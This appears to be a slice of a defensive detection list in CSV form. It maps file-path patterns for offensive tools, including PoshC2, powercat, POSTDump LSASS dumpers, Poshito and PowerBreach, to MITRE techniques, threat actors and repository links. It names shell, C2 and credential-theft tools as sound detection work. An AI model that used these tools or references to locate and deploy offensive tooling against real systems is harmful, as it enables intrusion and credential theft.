"*/portscan.yaml*",".{0,1000}\/portscan\.yaml.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation tool","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","9765"
"*/portscan/releases/*",".{0,1000}\/portscan\/releases\/.{0,1000}","offensive_tool_keyword","portscan","A simple TCP and UDP portscanner written in Go","T1595 - T1596 - T1594","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/zs5460/portscan","1","1","N/A","N/A","N/A","1","14","4","2022-11-11T09:26:47Z","2019-06-04T09:00:00Z","9766"
"*/PortScanner.ahk*",".{0,1000}\/PortScanner\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","9767"
"*/port-scan-tcp.ps1*",".{0,1000}\/port\-scan\-tcp\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","1","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","9768"
"*/port-scan-udp.ps1*",".{0,1000}\/port\-scan\-udp\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","1","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","9769"
"*/port-states.nse*",".{0,1000}\/port\-states\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9770"
"*/POSeidon.profile*",".{0,1000}\/POSeidon\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","9771"
"*/posh.key*",".{0,1000}\/posh\.key.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9772"
"*/posh.tpl*",".{0,1000}\/posh\.tpl.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","9773"
"*/PoshADCS.git*",".{0,1000}\/PoshADCS\.git.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","1","N/A","N/A","7","2","186","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z","9774"
"*/PoshC2*",".{0,1000}\/PoshC2.{0,1000}","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and Lateral Movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9775"
"*/poshc2-*",".{0,1000}\/poshc2\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9776"
"*/PoshC2/*",".{0,1000}\/PoshC2\/.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9777"
"*/posh-config*",".{0,1000}\/posh\-config.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9778"
"*/Poshito -w /Poshito/Poshito poshito*",".{0,1000}\/Poshito\s\-w\s\/Poshito\/Poshito\sposhito.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","N/A","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","9779"
"*/Poshito.dll*",".{0,1000}\/Poshito\.dll.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","1","N/A","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","9780"
"*/Poshito.exe*",".{0,1000}\/Poshito\.exe.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","1","N/A","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","9781"
"*/Poshito.git*",".{0,1000}\/Poshito\.git.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","1","N/A","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","9782"
"*/Poshito/Poshito/Agent*",".{0,1000}\/Poshito\/Poshito\/Agent.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","#linux","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","9783"
"*/posh-log*",".{0,1000}\/posh\-log.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9784"
"*/posh-project*",".{0,1000}\/posh\-project.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9785"
"*/posh-server*",".{0,1000}\/posh\-server.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9786"
"*/posh-service*",".{0,1000}\/posh\-service.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9787"
"*/posh-stop-service*",".{0,1000}\/posh\-stop\-service.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9788"
"*/posh-update*",".{0,1000}\/posh\-update.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9789"
"*/post_exploitation*",".{0,1000}\/post_exploitation.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9790"
"*/PostDump.exe*",".{0,1000}\/PostDump\.exe.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","9791"
"*/POSTDump.git*",".{0,1000}\/POSTDump\.git.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","9792"
"*/postLegit/grkg*",".{0,1000}\/postLegit\/grkg.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","9793"
"*/postLegit/qhwl*",".{0,1000}\/postLegit\/qhwl.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","9794"
"*/PotentiallyCrackableAccounts.ps1*",".{0,1000}\/PotentiallyCrackableAccounts\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","9795"
"*/PowerBreach.ps1*",".{0,1000}\/PowerBreach\.ps1.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","9796"
"*/PowerBruteLogon*",".{0,1000}\/PowerBruteLogon.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","8","2","124","22","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z","9797"
"*/powercat.git*",".{0,1000}\/powercat\.git.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","1","N/A","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","9798"
"*/powercat.ps1",".{0,1000}\/powercat\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","9799"
"*/powercat.ps1*",".{0,1000}\/powercat\.ps1.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","1","N/A","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","9800"
"*/PowerExtract.git*",".{0,1000}\/PowerExtract\.git.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","N/A","2","117","14","2025-03-28T10:49:43Z","2021-12-11T15:24:44Z","9801"
"*/PowerExtract.git*",".{0,1000}\/PowerExtract\.git.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","N/A","2","117","14","2025-03-28T10:49:43Z","2021-12-11T15:24:44Z","9802"
"*/powerfun.ps1*",".{0,1000}\/powerfun\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9803"
"*/powerglot/*",".{0,1000}\/powerglot\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","9804"
"*/powerkatz.dll*",".{0,1000}\/powerkatz\.dll.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","9805"
"*/powerkatz_x64.dll*",".{0,1000}\/powerkatz_x64\.dll.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","9806"
"*/powerkatz_x86.dll*",".{0,1000}\/powerkatz_x86\.dll.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","9807"
"*/Powerless.dll*",".{0,1000}\/Powerless\.dll.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","1","N/A","N/A","10","4","N/A","N/A","N/A","N/A","9808"
"*/powerloader.py*",".{0,1000}\/powerloader\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","9809"
